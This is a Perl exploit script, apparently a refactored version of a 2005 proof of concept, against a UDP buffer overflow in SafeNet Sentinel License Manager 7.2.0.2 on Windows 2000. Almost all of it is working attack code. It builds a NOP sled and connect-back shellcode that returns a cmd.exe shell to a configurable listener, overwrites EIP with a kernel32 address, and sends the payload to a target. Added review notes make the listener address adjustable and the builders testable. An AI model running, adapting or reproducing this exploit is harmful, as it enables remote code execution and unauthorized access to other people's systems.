#!/usr/bin/perl #ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO # # ************************************************** !!! WARNING !!! *********************************************************** # * FOR SECURITY TESTiNG ONLY! * # ****************************************************************************************************************************** # * By using this code you agree that I makes no warranties or representations, express or implied, about the * # * accuracy, timeliness or completeness of this, including without limitations the implied warranties of * # * merchantability and fitness for a particular purpose. * # * I makes NO Warranty of non-infringement. This code may contain technical inaccuracies or typographical errors. * # * This code can never be copyrighted or owned by any commercial company, under no circumstances what so ever. * # * but can be use for as long the developer, are giving explicit approval of the usage, and the user understand * # * and approve of all the parts written in this notice. * # * This program may NOT be used by any Danish company, unless explicit written permission from the developer . * # * Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect * # * or punitive damages arising out of access to, inability to access, or any use of the content of this code, * # * including without limitation any PC, other equipment or other property, even if I am Expressly advised of * # * the possibility of such damages. I DO NOT encourage criminal activities. If you use this code or commit * # * criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring, * # * and/or reading anything from this code you are considered to have accepted the terms and conditions and have read * # * this disclaimer. 
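# * Once again this code is for penetration testing purposes only. And once again, DO NOT DISTRIBUTE!                          *
# ******************************************************************************************************************************
#
# NOTICE:
# Flaw in Sentinel License Manager can result in Code Execution
#
# Affected Software:
# SafeNet Sentinel License Manager 7.2.0.2
#
# Operating system :
# - Windows 2000 Server SP4 <--- attack confirmed working by the original author
#
# The following error will end up in the event viewer:
# ------------------------------------------------------------------------
# Event Type: Error
# Event Source: Service Control Manager
# Event Category: None
# Event ID: 7031
# Description:
# The SentinelLM service terminated unexpectedly.
# ------------------------------------------------------------------------
#
# Review notes for this revision:
#   - strict/warnings are enabled; every former package global is a file-scoped lexical.
#   - The connect-back address baked into the shellcode (192.168.1.2:31337) is now
#     configurable with -lhost / -lport; the defaults reproduce the original bytes exactly.
#   - -target no longer has a hard-coded default (192.168.1.4), so the
#     "You must specify a target host" check is reachable instead of being dead code.
#   - The return address is packed with "V" (explicit little-endian) rather than "l"
#     (host-endian), so the payload is byte-identical when sent from a big-endian host.
#   - The UDP send and the socket close are error-checked; a usage error exits non-zero.
#   - main() only runs when the file is executed directly, so the payload builders can
#     be require'd and unit-tested without touching the network.

use strict;
use warnings;
use IO::Socket;
use Getopt::Long;

# ---- payload constants -------------------------------------------------------

# Address written over EIP.  The original author documents it as a CALL EBX
# inside KERNEL32.DLL on Windows 2000 Server SP4.  It is build-specific:
# verify it against the target's kernel32.dll before relying on it.
my $RET_ADDR = 0x7C571C73;

# NOP padding before the egg, between the egg and the return address, and after it
# (364 + 281 + 191 puts the return address at buffer offset 836).
my $PRE_NOPS  = 364;
my $MID_NOPS  = 191;
my $POST_NOPS = 2200;

# Connect-back listener hard-coded in the original shellcode; used as defaults.
my $DEFAULT_LHOST = '192.168.1.2';
my $DEFAULT_LPORT = 31337;

# Default UDP port of the SentinelLM listener.
my $DEFAULT_PORT = 5093;

# ---- helpers -----------------------------------------------------------------

# Encode a dotted-quad IPv4 address as the 4 raw bytes the shellcode pushes as
# sin_addr.  Dies on anything that is not four octets in 0..255; the shellcode
# performs no name resolution, so hostnames are deliberately rejected.
sub ip4_bytes {
    my ($addr) = @_;
    my @octets = ($addr =~ /\A(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\z/)
        or die "Error: lhost must be a dotted-quad IPv4 address, got '$addr'\n";
    for my $octet (@octets) {
        die "Error: octet $octet out of range in lhost '$addr'\n" if $octet > 255;
    }
    return pack('C4', @octets);
}

# Build the 281-byte connect-back shellcode (Windows, spawns cmd.exe over the
# socket) for the given listener.  Only the sin_addr immediate (after the
# "push imm32" opcode 0x68) and the sin_port immediate (after "mov bx, imm16",
# 0x66 0xbb) are substituted; every other byte is the original listing verbatim.
# Both arguments are optional and default to the original 192.168.1.2:31337.
sub build_egg {
    my ($lhost, $lport) = @_;
    $lhost = $DEFAULT_LHOST unless defined $lhost;
    $lport = $DEFAULT_LPORT unless defined $lport;
    die "Error: lport must be an integer in 1..65535, got '$lport'\n"
        unless $lport =~ /\A\d+\z/ && $lport >= 1 && $lport <= 65535;

    my $sin_addr = ip4_bytes($lhost);   # operand of push imm32
    my $sin_port = pack('n', $lport);   # operand of mov bx, imm16 (network byte order)

    my $egg = join('',
        "\x33\xc0\x33\xc9\xb1\x58\x2b\xe1\x8b\xfc\xf3\xaa\x8b\xec\x66\xb8",
        "\x6c\x6c\x66\x50\xb8\x33\x32\x2e\x64\x50\xb8\x77\x73\x32\x5f\x50",
        "\x8b\xc4\x50\xb8\xd5\x01\x59\x7c\xff\xd0\x8b\xe5\x89\x04\x24\x66",
        "\xbb\x74\x41\x66\x53\xbb\x6f\x63\x6b\x65\x53\xbb\x57\x53\x41\x53",
        "\x53\x8b\xdc\x53\x50\xbb\x5f\x0c\x59\x7c\xff\xd3\x8b\xe5\x33\xdb",
        "\x53\x53\x53\xb3\x06\x53\xb3\x01\x53\x43\x53\xff\xd0\x8b\xe5\x33",
        "\xdb\xb3\x14\x03\xe3\xb3\x44\x89\x1c\x24\xb3\x2c\x03\xe3\x33\xc9",
        "\xfe\xc5\x89\x0c\x24\xb3\x0c\x03\xe3\x89\x04\x24\x44\x44\x44\x44",
        "\x89\x04\x24\x44\x44\x44\x44\x89\x04\x24\x8b\xe5\x03\xe3\x68", $sin_addr,
        "\x66\xbb", $sin_port, "\x90\x90\x66\x53\x33\xdb\x43\x43\x66",
        "\x53\x8b\xe5\x8b\x1c\x24\x89\x04\x24\x66\xb8\x74\x74\x32\xe4\x66",
        "\x50\x66\xb8\x65\x63\x66\x50\xb8\x63\x6f\x6e\x6e\x50\x8b\xc4\x50",
        "\x53\xbb\x5f\x0c\x59\x7c\xff\xd3\x8b\xe5\x33\xdb\xb3\x10\x53\x45",
        "\x45\x45\x45\x55\x4d\x4d\x4d\x4d\x8b\xdd\xff\x33\xff\xd0\x8b\xe5",
        "\x66\xb8\x65\x65\x32\xe4\x66\x50\x66\xb8\x65\x78\x66\x50\xb8\x63",
        "\x6d\x64\x2e\x50\x8b\xc4\x8b\xcd\x51\x33\xdb\xb3\x14\x03\xcb\x51",
        "\x33\xdb\x53\x53\x53\x51\x53\x53\x50\x53\xb8\xa8\x4f\x59\x7c\xff",
        "\xd0\x50\xb8\x72\x69\x59\x7c\xff\xd0",
    );

    # Whether the vulnerable copy stops at a NUL is not established by this
    # script, so a listener address/port that encodes to 0x00 is flagged rather
    # than silently sent.
    warn "Warning: lhost/lport encode to a 0x00 byte; the payload may be truncated "
       . "if the overflowed copy is string-based\n"
        if index($sin_addr . $sin_port, "\0") >= 0;

    return $egg;
}

# Assemble the full overflow buffer (3040 bytes with the stock egg):
#   [364 x NOP][egg][191 x NOP][RET_ADDR, little-endian][2200 x NOP]
sub build_buffer {
    my ($egg) = @_;
    return join('',
        "\x90" x $PRE_NOPS,
        $egg,
        "\x90" x $MID_NOPS,
        pack('V', $RET_ADDR),   # overwrite EIP; "V" is little-endian on every host (x86 target)
        "\x90" x $POST_NOPS,
    );
}

# Print the banner/usage text and exit.  Extra arguments (Getopt::Long passes
# the option name and value) are ignored.
sub usage {
    print "\n" x 90;
    print "\t #################################################\n";
    print "\t # SafeNet Sentinel License Manager 7.2.0.2     #\n";
    print "\t # ************* !!! WARNING !!! ************    #\n";
    print "\t # ************ DO NOT DISTRIBUTE ***********    #\n";
    print "\t # ** FOR PRIVATE AND EDUCATIONAL USE ONLY! *    #\n";
    print "\t # ****************************************** #\n";
    print "\t # (c)2005 by Dennis Rand                        #\n";
    print "\t #################################################\n";
    print "\n\t -target\t\t eg.: 127.0.0.1\n";
    print "\t -port\t\t\t eg.: 5093\n";
    print "\t -lhost\t\t\t eg.: 192.168.1.2  (connect-back listener IP, default)\n";
    print "\t -lport\t\t\t eg.: 31337        (connect-back listener port, default)\n\n";
    print "\tUsage eg.: sentinelLM.pl -t 127.0.0.1 -p 5093\n";
    exit;
}

# Deliver $payload to $host:$udp_port as a single UDP datagram.
# UDP has no handshake: "Connecting" only creates the socket and sets its
# default peer, so the send is the only step that can actually fail.  A
# listener must already be waiting on the connect-back address for the
# shellcode to reach anything.
sub attack {
    my ($host, $udp_port, $egg, $payload) = @_;

    print "[*] Shellcode Size: " . length($egg) . " bytes\n";
    print "[*] Preparing Exploit Buffer......Ready\n";
    print "[*] Connecting To Target";
    my $sock = IO::Socket::INET->new(
        Proto    => 'udp',
        PeerAddr => $host,
        PeerPort => $udp_port,
    ) or die ". The server located at $host port $udp_port failed to respond \n";
    print " - DONE\n";

    print "[*] Sending Exploit";
    # print() on a datagram socket returns false when the kernel refuses the
    # send (e.g. after an ICMP port-unreachable); the original ignored that.
    print {$sock} $payload
        or die "\nError: send to $host:$udp_port failed: $!\n";
    close $sock
        or die "\nError: closing socket failed: $!\n";
    print " - DONE\n";
    print "[*] Exploit Delivered at target - Total byte size " . length($payload) . "\n\n";
    return;
}

# Parse options, validate them, build the payload and fire it.
# Returns the process exit status: 0 after delivery, 1 on a usage error.
sub main {
    $| = 1;                         # flush progress output immediately

    my $target;                     # intentionally no default: the check below must be reachable
    my $port  = $DEFAULT_PORT;
    my $lhost = $DEFAULT_LHOST;
    my $lport = $DEFAULT_LPORT;

    GetOptions(
        'target=s' => \$target,
        'port=i'   => \$port,
        'lhost=s'  => \$lhost,
        'lport=i'  => \$lport,
        'help|?'   => \&usage,
    ) or die "Try SentinelLM.pl -help or -?' for more information.\n";

    my $error = '';
    $error .= "Error: You must specify a target host\n" unless $target;
    $error .= "Error: You must specify a port number\n" unless $port;
    if ($error) {
        print "Try SentinelLM.pl -help or -?' for more information.\n$error\n";
        return 1;
    }

    print "\n\n\nSafeNet Sentinel License Manager 7.2.0.2 Buffer Overflow - $target on port $port ...";
    print "\n\n";

    my $egg = build_egg($lhost, $lport);
    attack($target, $port, $egg, build_buffer($egg));
    return 0;
}

# Run only when executed directly; when require'd (e.g. by a test) the
# builders above are available without sending anything.
exit main() unless caller;

1;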